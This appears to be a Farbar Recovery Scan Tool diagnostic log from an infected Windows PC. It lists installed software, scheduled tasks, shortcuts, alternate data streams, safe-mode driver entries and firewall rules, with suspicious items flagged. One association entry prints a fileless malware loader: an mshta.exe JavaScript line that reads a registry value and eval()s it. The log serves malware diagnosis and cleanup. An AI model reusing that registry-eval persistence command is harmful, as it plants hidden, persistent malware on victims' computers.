Java 8 Update 111 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Jewel Quest (remove only) (HKLM-x32\...\Jewel Quest) (Version:  - )
Jewel Quest 3 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest Solitaire III (remove only) (HKLM-x32\...\Jewel Quest Solitaire III) (Version:  - )
Junk Mail filter update (x32 Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Kaspersky Security Scan (HKLM-x32\...\InstallWIX_{D1282694-0693-41A8-ABC1-6D1FFC1F65C5}) (Version: 16.0.0.1344 - Kaspersky Lab)
Kaspersky Security Scan (x32 Version: 16.0.0.1344 - Kaspersky Lab) Hidden
Kaspersky Software Updater Beta (HKLM-x32\...\InstallWIX_{94C8D443-1D07-4E6D-A9EB-FDBA45A839D8}) (Version: 1.5.2.228 - Kaspersky Lab)
Kaspersky Software Updater Beta (x32 Version: 1.5.2.228 - Kaspersky Lab) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2907 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.2907 - CyberLink Corp.) Hidden
Letters from Nowhere Double Pack (HKLM-x32\...\5c5210d7d541dcde7bbbf44a769244f7) (Version:  - )
Lottso Deluxe (HKLM-x32\...\exent_696450) (Version:  - )
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft IntelliPoint 8.0 (HKLM\...\{563F041C-DFDB-437B-A1E8-E141E0906076}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Word 2002 (HKLM-x32\...\{911B0409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.6626.0 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{B9966F27-9678-4620-9579-925E3084647E}) (Version: 07.03.0719 - Microsoft Corporation)
Microsoft Works 2004 Setup Launcher (HKLM-x32\...\Works2004Setup) (Version:  - )
Microsoft Works Suite Add-in for Microsoft Word (HKLM-x32\...\{33BEE6F3-9987-4F98-A069-97A64EC8321A}) (Version: 7.0.0.0000 - Microsoft Corporation)
Mirror Magic (HKLM-x32\...\exent_764150) (Version:  - )
Mortimer Beckett Double Pack (HKLM-x32\...\d7390ee1a0664e5d7ee040b11c6c5052) (Version:  - )
Mozilla Firefox 50.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.0.1 (x86 en-US)) (Version: 50.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.0.1.6171 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
Off the Record: Linden Shades Collector's Edition (HKLM-x32\...\BFG-Off the Record - Linden Shades Collector's Edition) (Version:  - )
Online Games Manager v1.50 (HKLM-x32\...\Online Games Manager) (Version: 1.50.4 - Real Networks, Inc.)
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.)
PhotoNow! (x32 Version: 1.1.6904 - CyberLink Corp.) Hidden
Plants vs. Zombies (x32 Version: 2.2.0.95 - WildTangent) Hidden
Pogo Games (HKLM-x32\...\PogoDGC) (Version: 1.0 - ) <==== ATTENTION
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4204 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.4204 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3003 - CyberLink Corp.)
PowerDirector (x32 Version: 8.0.3003 - CyberLink Corp.) Hidden
Puzzle Solitaire (remove only) (HKLM-x32\...\Puzzle Solitaire) (Version:  - )
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.18.322.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6206 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30120 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.3023 - CyberLink Corp.) Hidden
Romance of Rome (HKLM-x32\...\4e22301604a3a670489ec087182c3f06) (Version:  - )
RtVOsd (HKLM\...\{091A0130-A82F-4A6D-9C61-3BBBB3289030}) (Version: 1.0.6 - Realtek Semiconductor Corp.)
Scrabble v2.0 (HKLM-x32\...\Scrabble v2.0) (Version:  - )
Slingo Deluxe (HKLM-x32\...\Slingo Deluxe) (Version: 1.0.11 - funkitron)
Spin and Win (remove only) (HKLM-x32\...\Spin and Win) (Version:  - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.1.6.64 - Synaptics Incorporated)
Trend Micro Internet Security (HKLM\...\{ABBD4BA8-6703-40D2-AB1E-5BB1F7DB49A4}) (Version: 10.0 - Trend Micro Inc.)
Trend Micro Password Manager (HKLM\...\3A0FB4E3-2C0D-4572-A24D-67F1CAABDDP35_is1) (Version: 3.7.0.1100 - Trend Micro Inc.)
Trend Micro Titanium (Version: 10.0 - Trend Micro Inc.) Hidden
Unit Layers (HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Unit Layers) (Version: 9.0 - Unit Layers)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Virtual Families (x32 Version: 2.2.0.95 - WildTangent) Hidden
Virtual Villagers - The Secret City (x32 Version: 2.2.0.95 - WildTangent) Hidden
WeatherBug® (HKLM-x32\...\WeatherBug®) (Version: 10.0.5.29 - Earth Networks, Inc.)
Wedding Salon (HKLM-x32\...\ecf17be8f49bd825ea5bc167b3c3e6d3) (Version:  - )
Wheel of Fortune 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (HP Games) (x32 Version: 4.0.10.16 - WildTangent) Hidden
WildTangent Games App (x32 Version: 4.0.10.16 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Word Bird Supreme (HKLM-x32\...\9d7a5d47589c0698700923dd986fcfa3) (Version:  - )
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version:  - Yahoo Inc.)
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {20E9FB50-D830-4C65-944B-35B95739ADE1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-26] (Google Inc.)
Task: {2E942A7E-FA99-4DD3-BD9F-92E9AEDE3BA3} - System32\Tasks\ServicePlan => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {3E9FC981-8B08-4455-AE56-6D1AFEDDD25B} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {43C92693-EB45-4EAB-9194-65333F008151} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-26] (Google Inc.)
Task: {548B28FD-136A-485C-BD28-9BDF6807032D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-08-23] (HP Inc.)
Task: {60462EB9-2F6D-47D8-9B7F-1254D9A8387D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-12] (Adobe Systems Incorporated)
Task: {637754C7-7447-4AC3-936D-4523EF69C19A} - System32\Tasks\HPCustParticipation HP Photosmart 7510 series => C:\Program Files\HP\HP Photosmart 7510 series\Bin\HPCustPartic.exe [2011-08-31] (Hewlett-Packard Co.)
Task: {6ED8EB46-0910-4360-9CAE-19E27455902B} - System32\Tasks\HPCeeScheduleForOwner => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-05-12] (HP Development Company, L.P.)
Task: {7FA7EA55-5648-4603-9A45-529DEBE3EA3D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-08-23] (HP Inc.)
Task: {804BCEAE-303E-4887-8566-789AF9878FD3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-08-14] (HP Inc.)
Task: {93D805C2-029B-4887-9BF0-D07E575FB62D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-08-15] (HP Inc.)
Task: {C3107BB7-3615-46DF-8762-60FA1BFFC646} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {E64C4B78-C7CD-48CB-8D2F-9FACFB72AA12} - System32\Tasks\RunAsStdUser Task => C:\Program Files (x86)\Pogo Games\PogoDGC.exe [2013-03-25] (iWin Inc.)
Task: {EDE4CF83-5407-4471-B818-DC680F968903} - \TidyNetwork Update -> No File <==== ATTENTION
Task: {F3720C23-BEEA-49AF-B7D8-9E5993FBE08B} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForOwner.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Owner\AppData\Local\767c1f6b\2930e3b3.lnk -> C:\Users\Owner\AppData\Local\767c1f6b\364acf2b.bat ()

ShortcutWithArgument: C:\Users\Owner\Desktop\Play Dream Day Wedding - Married in Manhatten.lnk -> C:\Remote Programs\Dream Day Wedding - Married in Manhatten\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=628950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play Legends of Solitaire Curse of the Dragons.lnk -> C:\Remote Programs\Legends of Solitaire Curse of the Dragons\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807150&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play Solitaire Kingdom Supreme.lnk -> C:\Remote Programs\Solitaire Kingdom Supreme\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=725950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play The Chronicles of Emerland Solitaire.lnk -> C:\Remote Programs\The Chronicles of Emerland Solitaire\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Villa Banana\Play Villa Banana.lnk -> C:\Remote Programs\Villa Banana\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=738050&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\The Chronicles of Emerland Solitaire\Play The Chronicles of Emerland Solitaire.lnk -> C:\Remote Programs\The Chronicles of Emerland Solitaire\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Solitaire Kingdom Supreme\Play Solitaire Kingdom Supreme.lnk -> C:\Remote Programs\Solitaire Kingdom Supreme\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=725950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Legends of Solitaire Curse of the Dragons\Play Legends of Solitaire Curse of the Dragons.lnk -> C:\Remote Programs\Legends of Solitaire Curse of the Dragons\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807150&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Dream Day Wedding - Married in Manhatten\Play Dream Day Wedding - Married in Manhatten.lnk -> C:\Remote Programs\Dream Day Wedding - Married in Manhatten\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=628950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default

==================== Loaded Modules (Whitelisted) ==============

2016-02-21 08:30 - 2015-03-31 06:08 - 00026408 _____ () C:\Program Files\Trend Micro\AMSP\boost_system-vc110-mt-1_57.dll
2016-02-21 08:30 - 2015-03-31 06:08 - 00058320 _____ () C:\Program Files\Trend Micro\AMSP\boost_date_time-vc110-mt-1_57.dll
2016-02-21 08:30 - 2015-03-31 06:09 - 00686608 _____ () C:\Program Files\Trend Micro\AMSP\sqlite3.dll
2016-02-21 08:30 - 2015-03-31 06:08 - 00110320 _____ () C:\Program Files\Trend Micro\AMSP\boost_thread-vc110-mt-1_57.dll
2016-02-21 08:30 - 2015-03-31 06:08 - 00036160 _____ () C:\Program Files\Trend Micro\AMSP\boost_chrono-vc110-mt-1_57.dll
2016-02-21 08:30 - 2015-03-31 06:09 - 01314920 _____ () C:\Program Files\Trend Micro\AMSP\libprotobuf.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00089088 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_thread-vc110-mt-1_52.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00018944 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_system-vc110-mt-1_52.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00049664 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_date_time-vc110-mt-1_52.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00761856 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_regex-vc110-mt-1_52.dll
2016-02-21 08:30 - 2014-08-01 19:17 - 00048128 _____ () C:\Program Files\Trend Micro\TMIDS\boost_date_time-vc110-mt-1_49.dll
2014-09-05 19:56 - 2013-11-13 14:08 - 00146736 ____N () C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
2016-02-21 08:30 - 2016-09-01 13:31 - 40970752 _____ () C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
2010-06-18 18:26 - 2010-06-18 18:26 - 00030264 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_LogicLayer.dll
2010-06-18 18:26 - 2010-06-18 18:26 - 00052280 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HardwareAccess.dll
2010-06-18 18:26 - 2010-06-18 18:26 - 00267832 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPCommon.XmlSerializers.dll
2010-06-10 18:42 - 2010-06-10 18:42 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-09-28 03:35 - 2010-09-28 03:35 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2015-12-15 13:38 - 2015-12-15 13:38 - 00326112 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\dblite.dll
2015-10-27 16:44 - 2015-10-27 16:44 - 00404952 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\ipm_service.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 45077376 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libcef.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 01650560 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libglesv2.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 00082304 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libegl.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00061440 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00131072 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\ECenter\ECLibrary.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00040960 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00005632 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00018944 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00036864 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Microsoft.Practices.EnterpriseLibrary.ExceptionHandling.Logging.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00007680 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:426D1496 [75]
AlternateDataStreams: C:\ProgramData\Temp:8A620099 [134]
AlternateDataStreams: C:\ProgramData\Temp:9AB56A06 [172]
AlternateDataStreams: C:\ProgramData\Temp:E73B14E2 [110]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\30553336.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31DADE60.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\55732387.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\30553336.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\31DADE60.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\55732387.sys => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30: "C:\Windows\system32\mshta.exe" "javascript:bXxl1P="oktC1";aI78=new ActiveXObject("WScript.Shell");luMP2="G";v42nLt=aI78.RegRead("HKCU\\software\\zorrezmj\\oxewpwu");LdTl1eK="v";eval(v42nLt);QT5Gd="gu1ev8s";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\trendmicro.com -> hxxps://pwm.trendmicro.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{ECC83859-F826-4E60-8C70-2679218588B5}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{2FD18DD4-08D1-44F4-90D1-0C71DB9B0B85}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{CACE2A3F-94D0-4A90-9C85-DE45A5BB75A9}] => (Allow) svchost.exe
FirewallRules: [{6E2A430E-41B8-4970-9896-E5137A06EF68}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{A3A4B663-7DAA-4562-A680-C47CAC7A17FC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector\PDR8.EXE
FirewallRules: [{AE3861D2-CD1F-47FF-9724-E3A282EA073E}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\CinemaNow\CinemaNow.exe
FirewallRules: [{A8C797C8-01D0-4B39-A2E5-574546EEB978}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\CinemaNow\CinemaNow.exe
FirewallRules: [{8F1ED23F-8124-47F8-BD9F-A386ACF70127}] => (Allow) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowShell.exe
FirewallRules: [{C993DBB6-02E1-43C3-85E5-32CF3ACCA4C5}] => (Allow) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowShell.exe
FirewallRules: [{2BDDBF74-AC62-49DB-BB26-236F0777BDF0}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD9\PowerDVD9.EXE
FirewallRules: [{89DAFBC5-CE52-4EA8-B5F6-E4E11A7574D2}] => (Allow) C:\Program Files\HP\HP Photosmart 7510 series\Bin\DeviceSetup.exe
FirewallRules: [{1589E52E-1E4D-4A40-98A8-B29A66DAAB59}] => (Allow) C:\Program Files\HP\HP Photosmart 7510 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [TCP Query User{F45D6C64-5311-4C97-94C4-415A65CA7E57}C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe] => (Block) C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe
FirewallRules: [UDP Query User{2F6C9022-660B-40F7-92F1-7CA32B6A4B77}C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe] => (Block) C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe
FirewallRules: [TCP Query User{C919D2B6-A863-4693-88C5-B6D935A25902}C:\windows\syswow64\dplaysvr.exe] => (Block) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{F017EC39-E28A-4239-A5D7-AD7A6E2D67DF}C:\windows\syswow64\dplaysvr.exe] => (Block) C:\windows\syswow64\dplaysvr.exe
